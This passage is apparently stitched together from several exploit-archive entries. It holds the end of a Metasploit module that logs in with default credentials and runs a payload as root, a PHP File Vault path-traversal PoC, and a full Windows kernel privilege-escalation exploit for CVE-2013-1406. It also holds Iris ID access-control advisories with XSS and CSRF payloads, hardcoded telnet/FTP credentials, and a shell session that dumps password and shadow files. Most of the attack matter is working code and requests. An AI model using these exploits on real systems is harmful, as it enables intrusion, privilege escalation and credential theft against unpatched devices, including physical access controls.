'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = Time.now.to_i
locale = "en_US"
user = "admin"
password = "admin"
enctype = "MD5"
password_entry = ""
password_clear = "admin"
password_hash, et = do_login(user, password_clear, et)
vprint_status("new password: #{password_hash} et: #{et}\n")
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
PHP File Vault version 0.9 , remote directory traversal and read file vulnerabilty
==================================================================================
Discovered by N_A, N_A[at]tutanota.com
======================================
Description
===========
A very small PHP website application which stores anonymously uploaded files and retrieves them by SHA1 hash (a fingerprint of the file which is provided after uploading). Developed for anonysource.org , a kanux project.
https://sourceforge.net/projects/php-file-vault
Vulnerability
=============
The vulnerability exists within the fileinfo.php file of the package:
A A A if (empty($_GET['sha1'])) die("sha1 is required to get file info");
A A A $sha1 = trim($_GET['sha1']);
the 'sha1' variable is requested via the GET method. It is passed as a variable to the 'parseFileInfo' function. This function incorporates a call to
the fopen() function within PHP:
A A A A A A function parseFileInfo($fi) {
A A A A A A $fh = fopen($fi,'r');
A A A A A A $fname = trim(fgets($fh));
A A A A A A fclose($fh);
A A A A A A return array($fname);
A A A A A }
The parseFileInfo() function is called within the file fileinfo.php with the 'sha1' variable inside:
A A A A A A if (!is_readable(FI.$sha1)) die("cannot read file info!");
A A A A A A list($fname) = parseFileInfo(FI.$sha1);
A A A A A A readfile('head.html');
A A A A A A if ($fname) echo "<h1><a href=\"/$sha1\">$fname</a></h1>";
This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker.
Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on.
Proof Of Concept
================
PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/*
CVE-2013-1406 exploitation PoC
by Artem Shishkin,
Positive Research,
Positive Technologies,
02-2013
*/
void __stdcall FireShell(DWORD dwSomeParam)
{
EscalatePrivileges(hProcessToElevate);
// Equate the stack and quit the cycle
#ifndef _AMD64_
__asm
{
pop ebx
pop edi
push 0xFFFFFFF8
push 0xA010043
}
#endif
}
HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0)
{
HANDLE hResult = 0;
DWORD dwLookupProcessID = dwProcessID;
if (pHandleTable == NULL)
{
printf("Ain't funny\n");
return 0;
}
if (dwLookupProcessID == 0)
{
dwLookupProcessID = GetCurrentProcessId();
}
for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
{
if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr))
{
hResult = pHandleTable->Handles[i].HandleValue;
break;
}
}
return hResult;
}
PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
PVOID pResult = 0;
DWORD dwLookupProcessID = dwProcessID;
if (pHandleTable == NULL)
{
printf("Ain't funny\n");
return 0;
}
if (dwLookupProcessID == 0)
{
dwLookupProcessID = GetCurrentProcessId();
}
for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
{
if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
{
pResult = (HANDLE)pHandleTable->Handles[i].Object;
break;
}
}
return pResult;
}
void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
DWORD dwLookupProcessID = dwProcessID;
if (pHandleTable == NULL)
{
printf("Ain't funny\n");
return;
}
if (dwLookupProcessID == 0)
{
dwLookupProcessID = GetCurrentProcessId();
}
for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
{
if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
{
pHandleTable->Handles[i].Object = NULL;
pHandleTable->Handles[i].HandleValue = NULL;
break;
}
}
return;
}
void PoolSpray()
{
// Init used native API function
lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL)
{
printf("Such a fail...\n");
return;
}
// Determine object size
// xp:
//const DWORD_PTR dwSemaphoreSize = 0x38;
// 7:
//const DWORD_PTR dwSemaphoreSize = 0x48;
DWORD_PTR dwSemaphoreSize = 0;
if (LOBYTE(GetVersion()) == 5)
{
dwSemaphoreSize = 0x38;
}
else if (LOBYTE(GetVersion()) == 6)
{
dwSemaphoreSize = 0x48;
}
unsigned int cycleCount = 0;
while (cycleCount < 50000)
{
HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL);
if (hTemp == NULL)
{
break;
}
++cycleCount;
}
printf("\t[+] Spawned lots of semaphores\n");
printf("\t[.] Initing pool windows\n");
Sleep(2000);
DWORD dwNeeded = 4096;
NTSTATUS status = 0xFFFFFFFF;
PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);
while (true)
{
status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL);
if (status != STATUS_SUCCESS)
{
dwNeeded *= 2;
VirtualFree(pBuf, 0, MEM_RELEASE);
pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE);
}
else
{
break;
}
};
HANDLE hHandlesToClose[0x30] = {0};
DWORD dwCurPID = GetCurrentProcessId();
PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf;
for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++)
{
if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID)
{
DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object;
DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue;
DWORD_PTR dwWindowAddress = 0;
bool bPoolWindowFound = false;
UINT iObjectsNeeded = 0;
// Needed window size is vmci packet pool chunk size (0x218) divided by
// Semaphore pool chunk size (dwSemaphoreSize)
iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0);
if (
// Not on a page boundary
((dwTestObjAddr & 0xFFF) != 0)
&&
// Doesn't cross page boundary
(((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000))
)
{
// Check previous object for being our semaphore
DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize;
if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL)
{
continue;
}
for (unsigned int j = 1; j < iObjectsNeeded; j++)
{
DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize);
HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr);
//printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal);
//printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr);
//printf("\tLooked up handle = %08X\n", hLookedUp);
if (hLookedUp != NULL)
{
hHandlesToClose[j] = hLookedUp;
if (j == iObjectsNeeded - 1)
{
// Now test the following object
dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize);
if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL)
{
hHandlesToClose[0] = (HANDLE)dwTestHandleVal;
bPoolWindowFound = true;
dwWindowAddress = dwTestObjAddr;
// Close handles to create a memory window
for (int k = 0; k < iObjectsNeeded; k++)
{
if (hHandlesToClose[k] != NULL)
{
CloseHandle(hHandlesToClose[k]);
CloseTableHandle(pHandleTable, hHandlesToClose[k]);
}
}
}
else
{
memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
break;
}
}
}
else
{
memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
break;
}
}
if (bPoolWindowFound)
{
printf("\t[+] Window found at %08X!\n", dwWindowAddress);
}
}
}
}
VirtualFree(pBuf, 0, MEM_RELEASE);
return;
}
void InitFakeBuf(PVOID pBuf, DWORD dwSize)
{
if (pBuf != NULL)
{
RtlFillMemory(pBuf, dwSize, 0x11);
}
return;
}
void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep)
{
/*
Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043
So, for every 0xXXXX0043 address we must suffice the following conditions:
lea edx, [eax+38h]
lock xadd [edx], ecx
cmp ecx, 1
Some sort of lock at [addr + 38] must be equal to 1. And
call dword ptr [eax+0ACh]
The call site is located at [addr + 0xAC]
Also fake the object to be dereferenced at [addr + 0x100]
*/
if (pBuf != NULL)
{
for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep)
{
PDWORD pLock = (PDWORD)(iAddr + 0x38);
PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC);
PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100);
*pLock = 1;
*pCallMeMayBe = (DWORD_PTR)FireShell;
*pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000;
}
}
return;
}
void PenetrateVMCI()
{
/*
VMware Security Advisory
Advisory ID: VMSA-2013-0002
Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability
Issue date: 2013-02-07
Updated on: 2013-02-07 (initial advisory)
CVE numbers: CVE-2013-1406
*/
DWORD dwPidToElevate = 0;
HANDLE hSuspThread = NULL;
bool bXP = (LOBYTE(GetVersion()) == 5);
bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1));
bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2));
if (!InitKernelFuncs())
{
printf("[-] Like I don't know where the shellcode functions are\n");
return;
}
if (bXP)
{
printf("[?] Who do we want to elevate?\n");
scanf_s("%d", &dwPidToElevate);
hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate);
if (hProcessToElevate == NULL)
{
printf("[-] This process doesn't want to be elevated\n");
return;
}
}
if (b7 || b8)
{
// We are unable to change an active process token on-the-fly,
// so we create a custom shell suspended (Ionescu hack)
STARTUPINFO si = {0};
PROCESS_INFORMATION pi = {0};
si.wShowWindow = TRUE;
WCHAR cmdPath[MAX_PATH] = {0};
GetSystemDirectory(cmdPath, MAX_PATH);
wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe");
if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE)
{
hProcessToElevate = pi.hProcess;
hSuspThread = pi.hThread;
}
}
HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hVMCIDevice != INVALID_HANDLE_VALUE)
{
UCHAR BadBuff[0x624] = {0};
UCHAR retBuf[0x624] = {0};
DWORD dwRet = 0;
printf("[+] VMCI service found running\n");
PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff;
pVmReq->Header.RequestSize = 0xFFFFFFF0;
PVOID pShellSprayBufStd = NULL;
PVOID pShellSprayBufQtd = NULL;
PVOID pShellSprayBufStd7 = NULL;
PVOID pShellSprayBufQtd7 = NULL;
PVOID pShellSprayBufChk8 = NULL;
if ((b7) || (bXP) || (b8))
{
/*
Significant bits of a PoolType of a chunk define the following regions:
0x0A000000 - 0x0BFFFFFF - Standard chunk
0x1A000000 - 0x1BFFFFFF - Quoted chunk
0x0 - 0xFFFFFFFF - Free chunk - no idea
Addon for Windows 7:
Since PoolType flags have changed, and "In use flag" is now 0x2,
define an additional region for Win7:
0x04000000 - 0x06000000 - Standard chunk
0x14000000 - 0x16000000 - Quoted chunk
*/
pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL))
{
printf("\t[-] Unable to map the needed memory regions, please try running the app again\n");
CloseHandle(hVMCIDevice);
return;
}
InitFakeBuf(pShellSprayBufStd, 0x2000000);
InitFakeBuf(pShellSprayBufQtd, 0x2000000);
InitFakeBuf(pShellSprayBufStd7, 0x2000000);
InitFakeBuf(pShellSprayBufQtd7, 0x2000000);
PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000);
PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000);
PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000);
PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000);
if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE)
{
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
}
PoolSpray();
if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE)
{
printf("\t[!] If you don't see any BSOD, you're successful\n");
if (b7 || b8)
{
ResumeThread(hSuspThread);
}
}
else
{
printf("[-] Not this time %d\n", GetLastError());
}
if (pShellSprayBufStd != NULL)
{
VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE);
}
if (pShellSprayBufQtd != NULL)
{
VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE);
}
}
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);
CloseHandle(hVMCIDevice);
}
else
{
printf("[-] Like I don't see vmware here\n");
}
CloseHandle(hProcessToElevate);
return;
}
Iris ID IrisAccess ICU 7000-2 Multiple XSS and CSRF Vulnerabilities
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
Affected version: ICU Software: 1.00.08
ICU OS: 1.3.8
ICU File system: 1.3.8
EIF Firmware [Channel 1]: 1.9
EIF Firmware [Channel 2]: 1.9
Iris TwoPi: 1.4.5
Summary: The ICU 7000-2 is an optional component used when the client requires
iris template data to be matched on the secure side of the door. When using ICU
no data is stored in the iCAM7 Iris Reader itself. The ICU also ensures that portal
operation can continue if the there is an interruption in communication with the
host computer. In such circumstances, the ICU retains the records of portal activity,
then automatically updates the host upon resumption of host communication. Every
ICU in the iCAM4000 / 7 series runs on a LINUX OS for added reliability. Independent
and fault tolerant, ICUs are connected up to 2 iCAMs and handle up to 100,000 users.
Desc: The application is prone to multiple reflected cross-site scripting vulnerabilities
due to a failure to properly sanitize user-supplied input to the 'HidChannelID' and
'HidVerForPHP' POST parameters in the 'SetSmarcardSettings.php' script. Attackers can
exploit this issue to execute arbitrary HTML and script code in a user's browser session.
The application also allows users to perform certain actions via HTTP requests without
performing any validity checks to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user visits a malicious web
site.
Tested on: GNU/Linux 3.0.51 (armv7l)
mylighttpd v1.0
PHP/5.5.13
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5345
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5345.php
06.05.2016
--
XSS PoC:
--------
POST /html/SetSmarcardSettings.php HTTP/1.1
Host: 10.0.0.17
Connection: close
Content-Length: x
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzczxmPRCR0fYr2SO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidChannelID"
2"><script>alert(1)</script>
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidcmbBook"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="cmbBook"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidDisOffSet"
13
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="txtOffSet"
13
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidDataFormat"
1
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidDataFormatVal"
1
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="DataFormat"
1
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidFileAvailable"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidEncryAlg"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="EncryAlg"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidFileType"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidIsFileSelect"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidUseAsProxCard"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidVerForPHP"
1.00.08"><script>alert(2)</script>
------WebKitFormBoundaryzczxmPRCR0fYr2SO--
CSRF PoC:
---------
<html>
<body>
<form action="http://10.0.0.17/cgi-bin/SetRS422Settings" method="POST">
<input type="hidden" name="HidChannelID" value="2" />
<input type="hidden" name="RS422State" value="0" />
<input type="hidden" name="HidRS422BitsSec" value="9" />
<input type="hidden" name="HidRS422DataBits" value="3" />
<input type="hidden" name="HidRS422Parity" value="1" />
<input type="hidden" name="HidRS422StopBits" value="2" />
<input type="hidden" name="HidRS422StartCharLength" value="2" />
<input type="hidden" name="HidRS422EndCharLength" value="2" />
<input type="hidden" name="HidRS422StartOne" value="7F" />
<input type="hidden" name="HidRS422StartTwo" value="F7" />
<input type="hidden" name="HidRS422EndOne" value="0D" />
<input type="hidden" name="HidRS422EndTwo" value="0A" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/
http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/
http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/
http://www.irisid.com/productssolutions/hardwareproducts/icam7-series/
Affected version: iCAM4000:
iCAM Software: 3.09.02
iCAM File system: 1.3
CMR Firmware: 5.5 and 3.8
EIF Firmware: 9.5 and 8.0
HID iClass Library: 2.01.05
ImageData Library: 1.153
Command Process: 1.02
iCAM7000:
iCAM Software: 8.01.07
iCAM File system: 1.4.0
EIF Firmware: 1.9
HID iClass Library: 1.00.00
ImageData Library: 01.01.32
EyeSeek Library: 5.00
Countermeasure Library: 3.00
LensFinder Library: 5.00
Tilt Assist Library: 4.00
Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution offered
by Iris ID provides fast, secure, and highly accurate, non-contact identification
by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy
integration with many Wiegand and network based access control, time and attendance,
visitor management and point of sale applications.
The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess
4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust,
iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional
wall-mount is used.
Desc: The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials.
When visiting the device interface with a browser on port 80, the application loads an applet
JAR file 'ICAMClient.jar' into user's browser which serves additional admin features. In the
JAR file there is an account 'rou' with password 'iris4000' that has read and limited write
privileges on the affected node. An attacker can access the device using these credentials
starting a simple telnet session on port 23 gaining access to sensitive information and/or
FTP access on port 21 (with EVERYTHING allowed) and uploading malicious content.
=====================================================================================
/html/ICAMClient.jar (ICAMClient.java):
---------------------------------------
97: param_host = getParameter("host");
98: param_user = "rou";//getParameter("user");
99: param_pass = "iris4000";//getParameter("pass"); // password
100: param_path = getParameter("path"); // path on the server
/etc/ftpd/ftpd.conf:
--------------------
69: # User list:
70: # Format: user=<login> <passwd> <subdir> <maxlogins> <flags>
71: # <login> user name
72: # <passwd> password or * for anonymous access
73: # <subdir> (internally appended to serverroot)
74: # the user has access to the WHOLE SUBTREE,
75: # if the server has access to it
76: # <maxlogins> maximal logins with this usertype
77: # <flags> D - download
78: # U - upload + making directories
79: # O - overwrite existing files
80: # M - allows multiple logins
81: # E - allows erase operations
82: # A - allows EVERYTHING(!)
101:
103: user=rou iris4000 / 5 A
=====================================================================================
Tested on: GNU/Linux 2.4.19 (armv5tel)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5347
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php
06.05.2016
--
telnet [IP]
iCAM4000 login: rou
Password:
[rou@iCAM4000 rou]# id
uid=500(rou) gid=500(rou) groups=500(rou)
[rou@iCAM4000 rou]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
rou:x:500:500::/home/rou:/bin/bash
[rou@iCAM4000 rou]# cd /web
[rou@iCAM4000 /web]# ls -al
total 0
drwxrwxr-x 1 rou rou 0 Jul 26 07:22 .
drwxr-xr-x 1 root root 0 Jan 1 1970 ..
drwxrwxr-x 1 rou rou 0 Jan 31 2013 cgi-bin
drwxrwxr-x 1 rou rou 0 Jan 31 2013 html
drwxrwxr-x 1 rou rou 0 Jan 31 2013 images
[rou@iCAM4000 /web]# cat /etc/shadow
root:{{REMOVED}}
bin:*:10897:0:99999:7:::
daemon:*:10897:0:99999:7:::
adm:*:10897:0:99999:7:::
lp:*:10897:0:99999:7:::
sync:*:10897:0:99999:7:::
shutdown:*:10897:0:99999:7:::
halt:*:10897:0:99999:7:::
mail:*:10897:0:99999:7:::
news:*:10897:0:99999:7:::
uucp:*:10897:0:99999:7:::
operator:*:10897:0:99999:7:::
games:*:10897:0:99999:7:::
gopher:*:10897:0:99999:7:::
ftp:*:10897:0:99999:7:::
nobody:*:10897:0:99999:7:::
rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7:::
[rou@iCAM4000 /web]# cat /etc/issue
Iris@ID iCAM4000 Linux (experimental)
Kernel 2.4.19-rmk7-pxa1 on an armv5tel
[rou@iCAM4000 /web]# ls -al html/
total 289
drwxrwxr-x 1 rou rou 0 Jan 31 2013 .
drwxrwxr-x 1 rou rou 0 Jul 26 07:22 ..
-rw-rw-r-- 1 rou rou 4035 Jan 31 2013 DHCPSettings_reboot.htm
-rw-rw-r-- 1 rou rou 100614 Jan 10 2008 ICAMClient.jar
-rw-rw-r-- 1 rou rou 6376 Jan 31 2013 WiegandSettings.htm
-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 authentication.htm
-rw-rw-r-- 1 rou rou 6166 Jan 31 2013 changeusername.htm
-rw-rw-r-- 1 rou rou 4816 Jan 31 2013 displayconfigsettings.htm
-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 downloadauthentication.htm
-rw-rw-r-- 1 rou rou 4850 Jan 31 2013 downloadvoice_result.htm
-rw-rw-r-- 1 rou rou 3237 Jan 31 2013 error.htm
-rw-rw-r-- 1 rou rou 3234 Jan 31 2013 error_ip.htm
-rw-rw-r-- 1 rou rou 3248 Jan 31 2013 error_loginfailure.htm
-rw-rw-r-- 1 rou rou 3349 Jan 31 2013 error_usb_ip.htm
-rw-rw-r-- 1 rou rou 6128 Jan 31 2013 ftpupload.htm
-rw-rw-r-- 1 rou rou 5331 Jan 31 2013 iCAMConfig.htm
-rw-rw-r-- 1 rou rou 4890 Jan 31 2013 icamconfig_reboot.htm
-rw-rw-r-- 1 rou rou 5314 Jan 31 2013 index.htm
-rw-rw-r-- 1 rou rou 7290 Jan 31 2013 main.htm
-rw-rw-r-- 1 rou rou 3662 Jan 31 2013 reboot_result.htm
-rw-rw-r-- 1 rou rou 5782 Jan 31 2013 smartcardauthentication.htm
-rw-rw-r-- 1 rou rou 17783 Jan 31 2013 smartcardconfig.htm
-rw-rw-r-- 1 rou rou 4895 Jan 31 2013 smartcardconfig_reboot.htm
-rw-rw-r-- 1 rou rou 5809 Jan 31 2013 smartcardconfig_result.htm
-rw-rw-r-- 1 rou rou 3672 Jan 31 2013 systeminfo.htm
-rw-rw-r-- 1 rou rou 5870 Jan 31 2013 updateicamconfig.htm
-rw-rw-r-- 1 rou rou 4239 Jan 31 2013 updateicamconfig_result.htm
-rw-rw-r-- 1 rou rou 6612 Jan 31 2013 updatenetworksettings.htm
-rw-rw-r-- 1 rou rou 4651 Jan 31 2013 updatenetworksettings_result.htm
-rw-rw-r-- 1 rou rou 5014 Jan 31 2013 updatenetworksettings_state.htm
-rw-rw-r-- 1 rou rou 3985 Jan 31 2013 upload.htm
-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 uploadauthentication.htm
-rw-rw-r-- 1 rou rou 4737 Jan 31 2013 uploadiriscapture_result.htm
-rw-rw-r-- 1 rou rou 6028 Jan 31 2013 voicemessagedownload.htm
-rw-rw-r-- 1 rou rou 6299 Jan 31 2013 voicemessageupdate.htm
-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 wiegandauthentication.htm
-rw-rw-r-- 1 rou rou 4893 Jan 31 2013 wiegandconfig_reboot.htm
[rou@iCAM4000 /web]# echo $SHELL
/bin/bash
[rou@iCAM4000 /web]# echo pwn > test.write
[rou@iCAM4000 /web]# cat test.write
pwn
[rou@iCAM4000 /web]# rm -rf test.write
[rou@iCAM4000 /web]# cd /etc/ftpd
[rou@iCAM4000 ftpd]# pwd
/etc/ftpd
[rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou
user=rou iris4000 / 5 A
[rou@iCAM4000 ftpd]# ^D
Connection to host lost.
Iris ID IrisAccess ICU 7000-2 Remote Root Command Execution
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
http://www.irisid.com/productssolutions/hardwareproducts/icu-7000-2/
Affected version: ICU Software: 1.00.08
ICU OS: 1.3.8
ICU File system: 1.3.8
EIF Firmware [Channel 1]: 1.9
EIF Firmware [Channel 2]: 1.9
Iris TwoPi: 1.4.5
Summary: The ICU 7000-2 is an optional component used when the client requires
iris template data to be matched on the secure side of the door. When using ICU
no data is stored in the iCAM7 Iris Reader itself. The ICU also ensures that portal
operation can continue if the there is an interruption in communication with the
host computer. In such circumstances, the ICU retains the records of portal activity,
then automatically updates the host upon resumption of host communication. Every
ICU in the iCAM4000 / 7 series runs on a LINUX OS for added reliability. Independent
and fault tolerant, ICUs are connected up to 2 iCAMs and handle up to 100,000 users.
Desc: The Iris ID IrisAccess ICU 7000-2 device suffers from an unauthenticated remote
